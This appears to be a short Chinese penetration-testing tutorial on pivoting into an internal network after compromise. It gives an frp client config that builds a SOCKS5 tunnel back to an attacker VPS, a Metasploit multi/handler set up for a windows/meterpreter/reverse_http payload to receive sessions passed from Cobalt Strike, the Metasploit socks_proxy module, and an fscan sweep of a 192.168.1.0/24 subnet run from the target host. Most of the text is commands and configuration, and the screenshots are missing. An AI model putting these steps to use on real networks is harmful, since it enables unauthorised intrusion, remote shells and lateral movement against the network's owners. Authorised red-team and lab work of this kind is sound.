FRP和MSF搭建socks5代理&fscan扫描内网漏洞

frp工具地址：

图片.png

frp配置

服务端frps.ini只需配置默认端口，默认7000，可自行修改，要保证自己vps的端口开放且没被占用就好。

图片.png

客户端配置

压缩包里有一个配置文件frpc_full.ini，里面有很多代理格式，socks、ssh等都有。

图片.png

图片.png

这里是配置的socks5代理,frpc.ini：

[common]
server_addr = vpsip
server_port = vpsport #与服务端相同

[plugin_socks5]
type = tcp
remote_port = 代理端口
plugin = socks5
plugin_user = abc
plugin_passwd = abc

使用

服务端：./frps -c frps.ini

图片.png

客户端： frpc.exe -c frpc.ini

图片.png

随后就可以使用vps:代理端口给需要代理的软件设置代理，然后进行内网漫游了。

MSF设置socks5代理

现在喜欢直接从cs上把会话传给msf，简单快速。

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST x.x.x.x
msf6 exploit(multi/handler) > set LPORT 7777

cs上新建一个监听然后增加会话就行了。
socks5代理模块：

msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT xxxx
msf6 auxiliary(server/socks_proxy) > run

fscan使用教程

图片.png

直接贴个图，很清晰。常用方式为上传到目标机器：

fscan.exe -h 192.168.1.1/24 -o result.txt